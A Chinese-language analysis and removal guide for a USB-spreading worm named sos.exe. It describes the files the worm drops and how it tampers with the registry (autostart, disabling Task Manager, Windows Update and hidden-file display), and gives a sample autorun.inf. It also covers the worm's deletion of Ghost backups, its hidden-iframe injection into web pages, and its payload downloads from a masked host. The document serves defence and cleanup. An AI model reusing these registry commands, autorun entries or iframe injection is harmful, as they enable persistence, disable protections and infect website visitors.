这是一个可以通过U盘传播的感染下载者,对系统有一定的破坏作用,是之前流行的crsss.exe病毒系列的一个新变种。
File: sos.exe
Size: 26624 bytes
AV命名:Worm.Win32.Agent.yzg(瑞星)
技术细节:
1.病毒运行后,衍生如下副本:
%systemroot%system32auToRun.inf
%systemroot%system32Systom.exe
在每个分区根目录下面生成auToRun.inf和Systom.exe,达到通过U盘等移动存储传播的目的。
2.调用reg.exe执行相应注册表操作:
(1)ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /V crsss /T REG_SZ /D
添加自身启动项目
(2)add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
禁用windows自动更新
(3)add HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_dword /d 00000001 /f
禁用任务管理器
(4)add "HKCUSoftwareMicrosoftWindowsCurrentVersionEXPlorerAdvanced" /v Hidden /t reg_dWord /d 00000000 /f
add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f
add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced
FolderHiddenSHOWALL" /v CheckedValue /t REG_SZ /d 0 /f
破坏显示隐藏文件的功能
(5)add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /t reg_dword /d 00000001 /f
不显示文件的扩展名
(6)add "HKCUSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /t REG_EXPAND_SZ /d
锁定主页
(7)add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
使得IE的主页设定选项不可选
3.检测带有如下字样的窗口并将其关闭
病毒
木马
检测
wpe
4.遍历所有磁盘分区删除*.gho文件,使得用户中毒后无法使用ghost恢复系统
5.遍历所有磁盘分区的INDEX.ASP,.HTM,INDEX.PHP,DEFAULT.ASP,DEFAULT.PHP,CONN.ASP文件
并在其尾部加入{IfrAmE src=http://www.*.cn/mywm/index.htm width=0 height=0}{/IfrAmE}的代码
6.调用IE连接网络通过http://www.*.cn/cj/tj/tj.asp进行感染统计
7.自身连接网络下载http://www.*.cn/cj/xiao.txt
http://www.*.cn/cj/table.txt
和http://www.*.cn/cj/IEURL.txt
到%systemroot%system32下面命名为h1.dll~h5.dll
三个文件均为网页文件
中毒后的sreng日志如下:
启动项目
注册表
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
{crsss}{C:WINDOWSsystem32Systom.exe} []
==================================
Autorun.inf
[C:]
[AuToRun]
open=sos.exe
shellopen=打开(&O)
shellopenCommand=sos.exe
shellopenDefault=1
shellexplore=资源管理器(&X)
shellexploreCommand=sos.exe
[D:]
[AuToRun]
open=sos.exe
shellopen=打开(&O)
shellopenCommand=sos.exe
shellopenDefault=1
shellexplore=资源管理器(&X)
shellexploreCommand=sos.exe
...
解决办法:
下载sreng: http://soft.wuse.edu.cn/Local/sam/sreng2.rar
启动计算机 进入
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
{crsss}{C:WINDOWSsystem32Systom.exe} []
系统修复-Windows Shell / IE
勾选如下选项
允许在Windows 2000/XP/Server 2003中使用任务管理器
设置主页为"about:blank"
允许Internet Explorer选项窗口和选项窗口的所有内容
显示隐藏文件
然后点击“修复”按钮
2.重启计算机
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
在左边的资源管理器中单击打开系统所在盘
删除如下文件
%systemroot%system32auToRun.inf
%systemroot%system32Systom.exe
%systemroot%system32h1.dll~h5.dll
在左边的资源管理器中单击打开每个分区
删除每个分区根目录下面的sos.exe和auToRun.inf